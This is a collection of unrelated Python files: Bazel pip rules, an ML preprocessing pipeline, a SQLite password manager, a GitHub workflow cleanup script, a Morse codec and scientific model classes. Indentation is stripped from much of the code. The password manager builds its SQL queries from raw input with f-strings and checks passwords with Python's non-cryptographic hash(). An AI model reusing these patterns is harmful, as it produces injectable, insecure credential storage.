pypi_name=wheel.distribution().lower(),
extra=extra.lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
for extra in wheel_to_extras.get(wheel, [])
]) for wheel in wheels
])
merged_whl_repo_name = "{reqs_repo_name}_merged".format(
reqs_repo_name=reqs_repo_name)
merged_py_library = '"@{merged_whl_repo_name}//:pkg"'.format(
merged_whl_repo_name=merged_whl_repo_name)
merged_whl_filegroup = '"@{merged_whl_repo_name}//:whl"'.format(
merged_whl_repo_name=merged_whl_repo_name)
if wheels:
whl_library_rule_list = []
for wheel in wheels:
extras = ','.join(
['"%s"' % extra for extra in wheel_to_extras.get(wheel, [])])
whl_library_rule = _make_whl_library_rule(
reqs_repo_name=reqs_repo_name,
whl_repo_name=_make_wheel_name(reqs_repo_name, wheel),
wheels=[wheel],
extras=extras)
whl_library_rule_list.append(whl_library_rule)
whl_library_rules = '\n'.join(whl_library_rule_list)
merged_whl_library_rule = _make_whl_library_rule(
reqs_repo_name=reqs_repo_name,
whl_repo_name=merged_whl_repo_name,
wheels=wheels,
extras='')
    else:
        whl_library_rules = 'pass'
        merged_whl_library_rule = ''
return _populate_bzl_template(
input_requirements_file_path=input_requirements_file_path,
whl_library_rules=whl_library_rules,
pypi_name_to_py_library=pypi_name_to_py_library,
pypi_name_to_whl_filegroup=pypi_name_to_whl_filegroup,
merged_whl_library_rule=merged_whl_library_rule,
merged_py_library=merged_py_library,
merged_whl_filegroup=merged_whl_filegroup)
def _make_wheel_to_extras(wheels):
"""Determines the list of possible "extras" for each .whl file.
The possibility of an extra is determined by looking at its
    additional requirements, and determining whether they are
satisfied by the complete list of available wheels.
Args:
wheels: a list of Wheel objects
Returns:
a dict that is keyed by the Wheel objects in wheels, and whose
values are lists of possible extras.
"""
pypi_name_to_wheel = {wheel.distribution(): wheel for wheel in wheels}
# TODO(mattmoor): Consider memoizing if this recursion ever becomes
# expensive enough to warrant it.
def is_possible(pypi_name, extra):
pypi_name = pypi_name.replace("-", "_")
# If we don't have the .whl at all, then this isn't possible.
if pypi_name not in pypi_name_to_wheel:
return False
wheel = pypi_name_to_wheel[pypi_name]
# If we have the .whl, and we don't need anything extra then
# we can satisfy this dependency.
if not extra:
return True
# If we do need something extra, then check the extra's
# dependencies to make sure they are fully satisfied.
for extra_dep in wheel.dependencies(extra=extra):
req = pkg_resources.Requirement.parse(extra_dep)
# Check that the dep and any extras are all possible.
if not is_possible(req.project_name, None):
return False
for extra_ in req.extras:
if not is_possible(req.project_name, extra_):
return False
# If all of the dependencies of the extra are satisfiable then
# it is possible to construct this dependency.
return True
return {
wheel: [
extra for extra in wheel.extras()
if is_possible(wheel.distribution(), extra)
]
for wheel in wheels
}
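# Illustration (hypothetical packages, written as comments only): if the requirements
# pulled in a "requests" wheel whose "security" extra depends on "pyOpenSSL", that extra
# is only reported as possible when a pyOpenSSL wheel was also downloaded; otherwise the
# extra is dropped from the mapping returned above.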
_WHL_LIBRARY_RULE_TEMPLATE = """
if "{whl_repo_name}" not in native.existing_rules():
{whl_library}(
name = "{whl_repo_name}",
whls = [{whls}],
requirements = "@{reqs_repo_name}//:requirements.bzl",
extras = [{extras}]
)"""
def _make_whl_library_rule(reqs_repo_name, whl_repo_name, wheels, extras):
whls = ', '.join([
'"@{name}//:{path}"'.format(
name=reqs_repo_name, path=wheel.basename()) for wheel in wheels
])
# Indentation here matters. whl_library must be within the scope
# of the function below. We also avoid reimporting an existing WHL.
return _WHL_LIBRARY_RULE_TEMPLATE.format(
whl_repo_name=whl_repo_name,
reqs_repo_name=reqs_repo_name,
extras=extras,
whl_library=_WHL_LIBRARY_RULE,
whls=whls)
_BZL_TEMPLATE = textwrap.dedent("""\
# Install pip requirements.
#
# Generated from {input}
load("@io_bazel_rules_python//python:whl.bzl", "{whl_library}")
def pip_install():
{whl_library_rules}
{merged_whl_library_rule}
_requirements = {{
{pypi_name_to_py_library}
}}
_whl_requirements = {{
{pypi_name_to_whl_filegroup}
}}
_merged_py_library = {merged_py_library}
_merged_whl_filegroup = {merged_whl_filegroup}
def pypi_requirements():
return _merged_py_library
def pypi_whl_requirements():
return _merged_whl_filegroup
def pypi_whl_requirement(name):
name_key = _make_name_key(name)
if name_key not in _whl_requirements:
fail("Could not find pip-provided whl dependency: '%s'; available: %s" % (name, sorted(_whl_requirements.keys())))
return _whl_requirements[name_key]
# Deprecated; don't use.
def requirement(name):
name_key = _make_name_key(name)
if name_key not in _requirements:
fail("Could not find pip-provided dependency: '%s'; available: %s" % (name, sorted(_requirements.keys())))
return _requirements[name_key]
def _make_name_key(name):
name_key = name.replace("-", "_").lower()
return name_key
""")
def _populate_bzl_template(input_requirements_file_path, whl_library_rules,
pypi_name_to_py_library, pypi_name_to_whl_filegroup,
merged_whl_library_rule, merged_py_library,
merged_whl_filegroup):
return _BZL_TEMPLATE.format(
input=input_requirements_file_path,
whl_library_rules=whl_library_rules,
pypi_name_to_py_library=pypi_name_to_py_library,
pypi_name_to_whl_filegroup=pypi_name_to_whl_filegroup,
whl_library=_WHL_LIBRARY_RULE,
merged_whl_library_rule=merged_whl_library_rule,
merged_py_library=merged_py_library,
merged_whl_filegroup=merged_whl_filegroup)
def _make_wheel_name(namespace, wheel):
return "{}_{}".format(namespace, wheel.repository_name())
if __name__ == '__main__':
main()
|
from loguru import logger
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer
from src.preprocessing_pipeline.transforms import (
set_df_index,
convert_to_str,
create_title_cat,
impute_age,
create_family_size,
drop_columns,
impute_missing_values,
scaler,
one_hot_encoder,
)
def create_preprocessing_pipeline(
pipeline_parameters: dict
):
"""
Description
-----------
Create a scikit learn pipeline to preprocess the data ready for modelling.
The pipeline uses a series of functions applied to the dataframe via
scikit-learn's FunctionTransformer class.
Each transformation step has a function assigned with the keyword arguments
applied through the supplied pipeline_parameters object.
Note that the pipeline works with pandas DataFrames over numpy arrays
because these are more interpretable and can be logged as artifacts.
Parameters
----------
pipeline_parameters: dict
Parameters containing the metadata associated with the pipeline
transformations.
Returns
-------
preprocessing_pipeline: sklearn.pipeline.Pipeline
The preprocessing pipeline
Raises:
-------
Exception: Exception
Generic exception for logging
Examples
--------
pipeline = create_pipeline(
("Step Description", FunctionTransformer(
func=my_func_name,
kw_args={"keyword_name" : "keyword_arg}
))
)
"""
try:
logger.info("Running create_preprocessing_pipeline()")
# Create the pre-processing pipeline
preprocessing_pipeline = Pipeline([
("Set dataframe index", FunctionTransformer(
func=set_df_index,
kw_args=pipeline_parameters["set_df_index_kw_args"]
)),
("Convert cols to string", FunctionTransformer(
func=convert_to_str,
kw_args=pipeline_parameters["convert_to_str_kw_args"]
)),
("Create title_cat column", FunctionTransformer(
func=create_title_cat,
kw_args=pipeline_parameters["create_title_cat_kw_args"]
)),
("Impute missing Age values", FunctionTransformer(
func=impute_age,
kw_args=pipeline_parameters["impute_age_kw_args"]
)),
("Create family_size column", FunctionTransformer(
func=create_family_size,
kw_args=pipeline_parameters["create_family_size_kw_args"]
)),
("Drop columns", FunctionTransformer(
func=drop_columns,
kw_args=pipeline_parameters["drop_columns_kw_args"]
)),
("Impute missing values", FunctionTransformer(
func=impute_missing_values,
kw_args=pipeline_parameters["impute_missing_values_kw_args"]
)),
("Scale numeric data", FunctionTransformer(
func=scaler,
kw_args=pipeline_parameters["scaler_kw_args"]
)),
("One hot encode categorical data", FunctionTransformer(
func=one_hot_encoder,
kw_args=pipeline_parameters["one_hot_kw_args"]
))
])
return preprocessing_pipeline
    except Exception as e:
        logger.exception("Exception in create_preprocessing_pipeline()")
        logger.exception(e)
        raise
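# A minimal usage sketch (hypothetical parameter values; the exact keyword arguments each
# transform accepts are defined in src.preprocessing_pipeline.transforms, so the inner
# dicts below are placeholders only):
#
#     pipeline_parameters = {
#         "set_df_index_kw_args": {...},
#         "convert_to_str_kw_args": {...},
#         "create_title_cat_kw_args": {...},
#         "impute_age_kw_args": {...},
#         "create_family_size_kw_args": {...},
#         "drop_columns_kw_args": {...},
#         "impute_missing_values_kw_args": {...},
#         "scaler_kw_args": {...},
#         "one_hot_kw_args": {...},
#     }
#     pipeline = create_preprocessing_pipeline(pipeline_parameters)
#     preprocessed_df = pipeline.fit_transform(raw_df)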
|
'''
1. Do the login
2. If the login is successful, use the working class
3. Else, no access allowed.
'''
import sqlite3
from .setup import fileName
from .Encryption import *
class Working:
def __init__(self, primaryPassword: str):
self.conn = sqlite3.connect(fileName)
self.cur = self.conn.cursor()
self.cur.execute("SELECT password FROM PrimaryPassword;")
hashFromDatabase = self.cur.fetchall()[0][0]
if hashFromDatabase == hash(primaryPassword):
# Login successful.
self._privateKey = hashEnc(primaryPassword)
self.loginStatus = True # True means successful login.
else:
self.loginStatus = False
self._privateKey = None
def changePrimaryPassword(self, oldPassword: str, newPassword: str) -> bool:
self.cur.execute("SELECT password FROM PrimaryPassword;")
hashFromDatabase = self.cur.fetchall()[0][0]
if hashFromDatabase == hash(oldPassword):
# Can change password.
self.cur.execute(f"UPDATE PrimaryPassword SET password = '{hash(newPassword)}' WHERE password = '{hash(oldPassword)}';")
self.conn.commit()
entries = self.seeEntries()
newKey = hashEnc(newPassword)
for entry in entries:
self.cur.execute(f"UPDATE Passwords SET password = '{encrypt(self.getEntry(entry[0], entry[1]), newKey)}' WHERE (email = '{entry[0]}' AND website = '{entry[1]}');")
self.conn.commit()
self._privateKey = newKey
return True
else:
return False
def getEntry(self, email: str, website: str) -> str:
try:
self.cur.execute(f"SELECT password FROM Passwords WHERE (email = '{email}' AND website = '{website}');")
encryptedData = self.cur.fetchall()[0]
return decrypt(encryptedData[0], self._privateKey)
except Exception:
return ""
    def putEntry(self, email: str, website: str, password: str) -> bool:
        try:
            self.cur.execute(f"INSERT INTO Passwords (email, website, password) VALUES ('{email}', '{website}', '{encrypt(password, self._privateKey)}');")
            self.conn.commit()
            return True
        except Exception:
            return False
def updateEntry(self, oldEmail: str, oldWebsite: str, email: str, website: str, password: str) -> None:
self.cur.execute(f"UPDATE Passwords SET email = '{email}', website = '{website}', password = '{encrypt(password, self._privateKey)}' WHERE (email = '{oldEmail}' AND website = '{oldWebsite}');")
self.conn.commit()
def seeEntries(self):
self.cur.execute("SELECT email, website FROM Passwords;")
return self.cur.fetchall()
        # Returns rows as (email, website) tuples.
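# A minimal usage sketch (hypothetical passwords and entries; assumes the SQLite database
# at `fileName` already contains the PrimaryPassword and Passwords tables created by setup):
#
#     session = Working("my-primary-password")
#     if session.loginStatus:
#         session.putEntry("user@example.com", "example.com", "s3cret")
#         print(session.seeEntries())                              # [(email, website), ...]
#         print(session.getEntry("user@example.com", "example.com"))
#     else:
#         print("Access denied")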
|
import torchvision.models as models
import torch
model = models.resnet50(pretrained=True)
model.eval()
batch = torch.randn((1, 3, 224, 224))
traced_model = torch.jit.trace(model, batch)
torch.jit.save(traced_model, 'resnet50.pt')
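# A minimal follow-up sketch: the saved TorchScript module can be loaded back and run
# without the original model definition (the output values are not asserted here).
loaded_model = torch.jit.load('resnet50.pt')
with torch.no_grad():
    output = loaded_model(batch)
print(output.shape)  # expected to be (1, 1000) for the standard ImageNet head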
|
from django.contrib import admin
from django.urls import path, include
from .views import api_root
app_name = 'core'
urlpatterns = [
    path('api-root/', api_root, name='api_root'),
]
|
#!/usr/bin/env python
""" Collection of numerically evaluated optical parameters
"""
def edlen(P,T,k,f):
""" Index of refraction of air, using the Edlen formula
Input parameters:
P - air pressure in Pa
T - the temperature in C
k - the vacuum wave number kL/(2*Pi) in um^-1
f - partial pressure of water vapor in the air, in Pa (can be
calculated from the relative humidity using the Goff-Gratch equation.
"""
return 1 + ((8342.54 + 2406147 / (130 - k ** 2) + 15998 / (38.9 - k **2)) * \
(P / 96095.43) * ((1 + 1e-8 * (0.601 - 0.00972 * T) * P) / (1 + 0.0036610 * T)) - \
f * (0.037345 - 0.000401 * k ** 2)) * 1e-8
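# A minimal usage sketch (illustrative values only, not reference data): air at roughly
# standard pressure, room temperature, a HeNe wavelength of ~0.633 um and a modest
# water-vapour partial pressure. The exact output is not asserted here.
if __name__ == "__main__":
    n_air = edlen(P=101325.0, T=20.0, k=1.0 / 0.633, f=1000.0)
    print("refractive index of air ~", n_air)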
|
# Copyright © 2019 Arm Ltd. All rights reserved.
# SPDX-License-Identifier: MIT
import numpy as np
from .._generated.pyarmnn import Tensor as annTensor, TensorInfo, DataType_QuantisedAsymm8, \
DataType_Float32, DataType_QuantisedSymm16, DataType_Signed32, DataType_Float16
class Tensor(annTensor):
"""pyArmnn Tensor object
This class overrides the swig generated Tensor class. The aim of
this is to create an easy to use public api for the Tensor object.
Memory is allocated and managed by this class, avoiding the need to manage
a separate memory area for the tensor compared to the swig generated api.
"""
def __init__(self, *args):
""" Create Tensor object.
Supported tensor data types:
DataType_QuantisedAsymm8,
DataType_QuantisedSymm16,
DataType_Signed32,
DataType_Float32,
DataType_Float16
Examples:
Create an empty tensor
>>> import pyarmnn as ann
>>> ann.Tensor()
Create tensor given tensor information
>>> ann.Tensor(ann.TensorInfo(...))
Create tensor from another tensor i.e. copy a tensor
>>> ann.Tensor(ann.Tensor())
Args:
tensor(Tensor, optional): Create Tensor from a Tensor i.e. copy.
tensor_info (TensorInfo, optional): Tensor information.
Raises:
TypeError: unsupported input data type.
ValueError: appropriate constructor could not be found with provided arguments.
"""
self.__memory_area = None
# TensorInfo as first argument, we need to create memory area manually
if len(args) > 0 and isinstance(args[0], TensorInfo):
self.__create_memory_area(args[0].GetDataType(), args[0].GetNumElements())
super().__init__(args[0], self.__memory_area.data)
# copy constructor - reference to memory area is passed from copied tensor
# and armnn's copy constructor is called
elif len(args) > 0 and isinstance(args[0], Tensor):
self.__memory_area = args[0].get_memory_area()
super().__init__(args[0])
# empty constructor
elif len(args) == 0:
super().__init__()
else:
raise ValueError('Incorrect number of arguments or type of arguments provided to create Tensor.')
def __copy__(self) -> 'Tensor':
""" Make copy of a tensor.
Make tensor copyable using the python copy operation.
Note:
The tensor memory area is NOT copied. Instead, the new tensor maintains a
reference to the same memory area as the old tensor.
Example:
Copy empty tensor
>>> from copy import copy
>>> import pyarmnn as ann
>>> tensor = ann.Tensor()
>>> copied_tensor = copy(tensor)
Returns:
Tensor: a copy of the tensor object provided.
"""
return Tensor(self)
def __create_memory_area(self, data_type: int, num_elements: int):
""" Create the memory area used by the tensor to output its results.
Args:
data_type (int): The type of data that will be stored in the memory area.
See DataType_*.
num_elements (int): Determines the size of the memory area that will be created.
"""
np_data_type_mapping = {DataType_QuantisedAsymm8: np.uint8,
DataType_Float32: np.float32,
DataType_QuantisedSymm16: np.int16,
DataType_Signed32: np.int32,
DataType_Float16: np.float16}
if data_type not in np_data_type_mapping:
raise ValueError("The data type provided for this Tensor is not supported.")
self.__memory_area = np.empty(shape=(num_elements,), dtype=np_data_type_mapping[data_type])
def get_memory_area(self) -> np.ndarray:
""" Get values that are stored by the tensor.
Returns:
ndarray : Tensor data (as numpy array).
"""
return self.__memory_area
|
"""Utility functions for RL training."""
import torch
import numpy as np
def discount(rewards, gamma):
"""
Discount the reward trajectory.
Parameters
----------
rewards : list of float
Reward trajectory.
gamma : float
Discount factor.
Returns
-------
discounted_rewards : list of float
Discounted reward trajectory.
"""
R = 0.0
discounted_rewards = []
for r in reversed(rewards):
R = r + gamma * R
discounted_rewards.insert(0, R)
    device = rewards.device if torch.is_tensor(rewards) else "cpu"
    discounted_rewards = torch.tensor(discounted_rewards, device=device)
return discounted_rewards
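# Worked example of the discounting above (a sketch; the values are hand-computed):
# with gamma = 0.9 and rewards [1.0, 1.0, 1.0], working backwards gives
#   R = 1.0, then 1.0 + 0.9 * 1.0 = 1.9, then 1.0 + 0.9 * 1.9 = 2.71,
# so discount([1.0, 1.0, 1.0], 0.9) returns tensor([2.7100, 1.9000, 1.0000]).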
def construct_state(world, robot, device="cpu"):
"""
Construct state as a tensor given world and robot.
State is the concatenation of:
- XY coordinates of the goal (2 dim)
- XY coordinates of the tip position (2 dim)
- Pose information of other objects (7 * n_obj dim)
- Joint angles (7 dim)
Parameters
----------
world : env.Environment object
Environment instance.
robot : torobo_wrapper.Torobo object
Torobo instance.
device : string or torch.device
Device of state tensor.
Returns
-------
state : torch.tensor
State tensor.
"""
tip_x = np.array(robot.get_tip_pos()[:2])
joint_angles = robot.get_joint_angles()
object_x = world.get_state().reshape(-1, 7)
object_x[:, :2] = object_x[:, :2] - tip_x
x = np.concatenate([object_x[0, :2], tip_x, joint_angles, object_x[1:].reshape(-1)])
x = torch.tensor(x, dtype=torch.float, device=device)
return x
def clip_to_rectangle(x, global_limits):
"""
Clip x to global limits.
Parameters
----------
x : list of float
Array to be clipped.
global_limits : list of list of float
Global operational limits. [[min_x, max_x], [min_y, max_y]].
Returns
-------
clipped : list of float
Clipped state.
"""
clipped = x.copy()
clipped[0] = np.clip(clipped[0], global_limits[0][0], global_limits[0][1])
clipped[1] = np.clip(clipped[1], global_limits[1][0], global_limits[1][1])
return clipped
def in_rectangle(x, rectangle):
"""
Check whether x is in rectangle.
Parameters
----------
x : list of float
2-dimensional point. [x, y]
rectangle : list of list of float
Rectangle limits. [[min_x, max_x], [min_y, max_y]]
Returns
-------
result : bool
True if point is in rectangle limits else False.
"""
p = np.array(x)
rec = np.array(rectangle)
result = False
if (rec[:, 0] < p).all() and (p < (rec[:, 1])).all():
result = True
return result
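# Small illustrative checks (hand-worked, written as comments):
#   clip_to_rectangle([1.5, -0.2], [[0.0, 1.0], [0.0, 1.0]]) -> [1.0, 0.0]
#   in_rectangle([0.5, 0.5], [[0.0, 1.0], [0.0, 1.0]]) -> True (strict inequalities)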
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .mnist_classifier import MNISTClassifier
__all__ = ('MNISTClassifier',)
|
import argparse
import github
import requests
from classroom_tools import github_utils
parser = argparse.ArgumentParser()
parser.add_argument(
'--token',
required=True,
help='GitHub personal access token with repo permissions'
)
parser.add_argument(
'--repo_fullname',
required=True,
help='Repository fullname'
)
parser.add_argument(
'--workflow_name_filter',
help='Delete workflow runs with names that contain this filter'
)
parser.add_argument(
'--delete_only_failed_runs',
default=False,
action='store_true',
help='Delete only workflow runs that failed'
)
def delete_workflow_run(workflow_run_url, token):
print(f'Deleting: {workflow_run_url}')
res = requests.delete(url=workflow_run_url,
headers={'Authorization': f'token {token}'})
print('Success' if res.ok else 'Failed')
def main(args):
print('\n\n' + 'Deleting workflow runs'.center(80, '='))
args = parser.parse_args(args)
print('Args:\n' + ''.join(f'\t{k}: {v}\n' for k, v in vars(args).items()))
github_utils.verify_token(args.token)
g = github.Github(login_or_token=args.token)
repo = g.get_repo(full_name_or_id=args.repo_fullname)
workflow_dict = {}
for run in repo.get_workflow_runs():
workflow_name = repo.get_workflow(id_or_name=str(run.raw_data['workflow_id'])).name
workflow_dict.setdefault(workflow_name, [])
workflow_dict[workflow_name].append(run)
for workflow_name, runs in workflow_dict.items():
if len(runs) > 1:
if args.delete_only_failed_runs:
failed_runs = list(
filter(
lambda run: run.conclusion == 'failure' and run.status == 'completed',
runs
),
)
                for run in failed_runs:
                    if args.workflow_name_filter is not None:
                        if args.workflow_name_filter in workflow_name:
                            delete_workflow_run(run.url, args.token)
                    else:
                        delete_workflow_run(run.url, args.token)
else:
runs.sort(key=lambda run: run.created_at, reverse=True)
for run in runs[1:]:
if args.workflow_name_filter is not None:
if args.workflow_name_filter in workflow_name:
delete_workflow_run(run.url, args.token)
else:
delete_workflow_run(run.url, args.token)
if __name__ == '__main__':
import sys
main(sys.argv[1:])
|
"""A Morse code encoder and decoder.
Morse code consists of "dits", "dahs" and spaces. A dit or dah is a signal,
whereas a space is an absensce of signal. A dit is one unit of Morse time (or
beat) a dah is three. Each dit or dah is followed by a space of one dit. Each
character is followed by a space of three dits, and words are separated by a
space of seven dits.
"""
from enigma.keyer import Keyer
MORSE_CODE = {
"A": ".-",
"B": "-...",
"C": "-.-.",
"D": "-..",
"E": ".",
"F": "..-.",
"G": "--.",
"H": "....",
"I": "..",
"J": ".---",
"K": "-.-",
"L": ".-..",
"M": "--",
"N": "-.",
"O": "---",
"P": ".--.",
"Q": "--.-",
"R": ".-.",
"S": "...",
"T": "-",
"U": "..-",
"V": "...-",
"W": ".--",
"X": "-..-",
"Y": "-.--",
"Z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----",
}
# Define space (in "dits") at end of characters and words
MORSE_CHAR_SPACE = " " * 3
MORSE_WORD_SPACE = " " * 7
class Morse:
"""Morse code encoder/decoder."""
def __init__(self):
"""Initialise empty text and Morse attributes."""
self.text = ""
self.morse = ""
def encode(self, text):
"""Encode the input text to Morse.
:param text: text to convert to Morse
:type text: str
"""
self.text = text.upper()
self.morse = ""
print(f"Text: {self.text}")
# Convert each character to Morse, then add end-of-character space
for char in self.text:
self.morse += MORSE_CODE[char] + MORSE_CHAR_SPACE
print(f"Morse: {self.morse}")
def decode(self, morse):
"""Decode input Morse to text.
:param morse: input Morse code
:type morse: str
"""
self.morse = morse
self.text = ""
print(f"Morse: {self.morse}")
# Play Morse code sound
keyer = Keyer(self.morse)
keyer.play()
# Break up Morse words
morse_words = self.morse.split(MORSE_WORD_SPACE)
self.decode_words(morse_words)
print(f"Text: {self.text}")
def decode_words(self, morse_words):
"""Decode a list of Morse words.
:param morse_words: list of Morse words
:type morse_words: list
"""
# Split each word into letters and decode them
for morse_word in morse_words:
morse_letters = morse_word.split(MORSE_CHAR_SPACE)
self.decode_letters(morse_letters)
# Add space after word
self.text += " "
def decode_letters(self, morse_letters):
"""Decode a list of Morse letters.
:param morse_letters: list of Morse letters
:type morse_letters: list
"""
for morse_letter in morse_letters:
# Look up each Morse letter to find text letter
for key, value in MORSE_CODE.items():
if value == morse_letter:
# Found matching Morse; add corresponding text letter
self.text += key
break
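# A minimal usage sketch (assumes the enigma.keyer audio backend is available, since
# decode() plays the Morse aloud before translating it back to text):
if __name__ == "__main__":
    morse = Morse()
    morse.encode("SOS")              # prints the text and its dit/dah representation
    morse.decode("...   ---   ...")  # plays the tones, then prints the decoded text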
|
##############################################################################
#
# Copyright (c) 2003-2020 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
# Development from 2019 by School of Earth and Environmental Sciences
#
##############################################################################
from __future__ import division, print_function
__copyright__="""Copyright (c) 2003-2020 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Apache License, version 2.0
http://www.apache.org/licenses/LICENSE-2.0"""
__url__="https://launchpad.net/escript-finley"
from esys.escript import length, wherePositive, whereNegative, exp, inf, sup, Scalar, Function, Solution
from esys.escript.modelframe import Model,ParameterSet
from esys.escript.linearPDEs import LinearPDE
from math import log
import numpy
class Sequencer(Model):
"""
Runs through time until t_end is reached.
:ivar t_end: model is terminated when t_end is passed, default 1 (in).
:type t_end: ``float``
:ivar dt_max: maximum time step size, default `Model.UNDEF_DT` (in)
:type dt_max: ``float``
:ivar t: current time stamp (in/out). By default it is initialized with zero.
:type t: ``float``
"""
def __init__(self,**kwargs):
"""
"""
super(Sequencer,self).__init__(**kwargs)
self.declareParameter(t=0.,
t_end=1.,
dt_max=Model.UNDEF_DT)
def doInitialization(self):
"""
initialize time integration
"""
self.__t_old = self.t
def doStepPreprocessing(self, dt):
self.t = self.__t_old+dt
def doStepPostprocessing(self, dt):
self.__t_old = self.t
def finalize(self):
"""
returns true when `t` has reached `t_end`
"""
return self.t >= self.t_end
def getSafeTimeStepSize(self, dt):
"""
returns `dt_max`
"""
return self.dt_max
class GaussianProfile(ParameterSet):
"""
Generates a Gaussian profile at center x_c, width width and height A
over a domain
:note: Instance variable domain - domain
:note: Instance variable x_c - center of the Gaussian profile (default [0.,0.,0.])
:note: Instance variable A - (in) height of the profile. A maybe a vector. (default 1.)
:note: Instance variable width - (in) width of the profile (default 0.1)
:note: Instance variable r - (in) radius of the circle (default = 0)
    In the case that the spatial dimension is two, the third component of
    x_c is dropped.
"""
def __init__(self,**kwargs):
super(GaussianProfile, self).__init__(**kwargs)
self.declareParameter(domain=None,
x_c=numpy.zeros([3]),
A=1.,
width=0.1,
r=0)
def out(self):
"""
Generate the Gaussian profile
Link against this method to get the output of this model.
"""
x = self.domain.getX()
dim = self.domain.getDim()
l = length(x-self.x_c[:dim])
m = whereNegative(l-self.r)
return (m+(1.-m)*exp(-log(2.)*(l/self.width)**2))*self.A
class InterpolateOverBox(ParameterSet):
"""
    Returns values at each domain location by bilinear (2D) or trilinear (3D)
    interpolation between the values given at the corners of the domain's
    bounding box. For two-dimensional domains the back values are ignored.
:note: Instance variable domain - domain
:note: Instance variable value_left_bottom_front - (in) value at left,bottom,front corner
:note: Instance variable value_right_bottom_front - (in) value at right, bottom, front corner
:note: Instance variable value_left_top_front - (in) value at left,top,front corner
:note: Instance variable value_right_top_front - (in) value at right,top,front corner
:note: Instance variable value_left_bottom_back - (in) value at left,bottom,back corner
:note: Instance variable value_right_bottom_back - (in) value at right,bottom,back corner
:note: Instance variable value_left_top_back - (in) value at left,top,back corner
:note: Instance variable value_right_top_back - (in) value at right,top,back corner
"""
def __init__(self, **kwargs):
        super(InterpolateOverBox, self).__init__(**kwargs)
self.declareParameter(domain=None,
value_left_bottom_front=0.,
value_right_bottom_front=0.,
value_left_top_front=0.,
value_right_top_front=0.,
value_left_bottom_back=0.,
value_right_bottom_back=0.,
value_left_top_back=0.,
value_right_top_back=0.)
def out(self):
"""
values at domain locations by bilinear interpolation of the given values.
Link against this method to get the output of this model.
"""
x = self.domain.getX()
if self.domain.getDim() == 2:
x0,x1=x[0],x[1]
left_bottom_front0,right_top_back0=inf(x0),sup(x0)
left_bottom_front1,right_top_back1=inf(x1),sup(x1)
f_right = (x0 - left_bottom_front0)/(right_top_back0 -left_bottom_front0)
f_left = 1. - f_right
f_top = (x1 - left_bottom_front1)/(right_top_back1 - left_bottom_front1)
f_bottom = 1. - f_top
out = f_left * f_bottom * self.value_left_bottom_front \
+ f_right * f_bottom * self.value_right_bottom_front \
+ f_left * f_top * self.value_left_top_front \
+ f_right * f_top * self.value_right_top_front
else:
x0,x1,x2=x[0],x[1],x[2]
left_bottom_front0,right_top_back0=inf(x0),sup(x0)
left_bottom_front1,right_top_back1=inf(x1),sup(x1)
left_bottom_front2,right_top_back2=inf(x2),sup(x2)
f_right = (x0 - left_bottom_front0)/(right_top_back0 - left_bottom_front0)
f_left = 1. - f_right
f_top = (x1 - left_bottom_front1)/(right_top_back1 - left_bottom_front1)
f_bottom = 1. - f_top
            f_back = (x2 - left_bottom_front2)/(right_top_back2 - left_bottom_front2)
f_front = 1. - f_back
out = f_left * f_bottom * f_front * self.value_left_bottom_front\
+ f_right * f_bottom * f_front * self.value_right_bottom_front\
+ f_left * f_top * f_front * self.value_left_top_front\
+ f_right * f_top * f_front * self.value_right_top_front\
+ f_left * f_bottom * f_back * self.value_left_bottom_back\
+ f_right * f_bottom * f_back * self.value_right_bottom_back\
+ f_left * f_top * f_back * self.value_left_top_back\
+ f_right * f_top * f_back * self.value_right_top_back
return out
class InterpolatedTimeProfile(ParameterSet):
"""
Returns values at each time. The values are defined through given
values at time node.
value[i] defines the value at time nodes[i]. Between nodes linear
interpolation is used.
For time t<nodes[0], value[0] is used and for t>nodes[l], values[l]
is used where l=len(nodes)-1.
:note: Instance variable t - (in) current time
:note: Instance variable node - (in) list of time nodes
:note: Instance variable values - (in) list of values at time nodes
"""
def __init__(self,**kwargs):
super( InterpolatedTimeProfile, self).__init__(**kwargs)
self.declareParameter(t=0., \
nodes=[0.,1.],\
values=[1.,1.])
def out(self):
"""
current value
Link against this method to get the output of this model.
"""
l = len(self.nodes) - 1
t = self.t
if t <= self.nodes[0]:
return self.values[0]
else:
            for i in range(1, l+1):
if t < self.nodes[i]:
m = (self.values[i-1] - self.values[i])/\
(self.nodes[i-1] - self.nodes[i])
return m*(t-self.nodes[i-1]) + self.values[i-1]
return self.values[l]
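# Worked example (as comments, assuming the interpolation loop above covers every
# interval): with nodes = [0., 2.] and values = [0., 4.], out() returns 0. for t <= 0,
# 4. for t >= 2, and linear interpolation in between, e.g. t = 1. gives 2.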
class ScalarDistributionFromTags(ParameterSet):
"""
creates a scalar distribution on a domain from tags, If tag_map is given
the tags can be given a names and tag_map is used to map it into domain tags.
:ivar domain: domain
:type domain: `esys.escript.Domain`
:ivar default: default value
:ivar tag0: tag 0
:type tag0: ``int``
:ivar value0: value for tag 0
:type value0: ``float``
:ivar tag1: tag 1
:type tag1: ``int``
:ivar value1: value for tag 1
:type value1: ``float``
:ivar tag2: tag 2
:type tag2: ``int``
:ivar value2: value for tag 2
:type value2: ``float``
:ivar tag3: tag 3
:type tag3: ``int``
:ivar value3: value for tag 3
:type value3: ``float``
:ivar tag4: tag 4
:type tag4: ``int``
:ivar value4: value for tag 4
:type value4: ``float``
:ivar tag5: tag 5
:type tag5: ``int``
:ivar value5: value for tag 5
:type value5: ``float``
:ivar tag6: tag 6
:type tag6: ``int``
:ivar value6: value for tag 6
:type value6: ``float``
:ivar tag7: tag 7
:type tag7: ``int``
:ivar value7: value for tag 7
:type value7: ``float``
:ivar tag8: tag 8
:type tag8: ``int``
:ivar value8: value for tag 8
:type value8: ``float``
:ivar tag9: tag 9
:type tag9: ``int``
:ivar value9: value for tag 9
:type value9: ``float``
"""
def __init__(self,**kwargs):
super(ScalarDistributionFromTags, self).__init__(**kwargs)
self.declareParameter(domain=None,
default=0.,
tag0=None,
value0=0.,
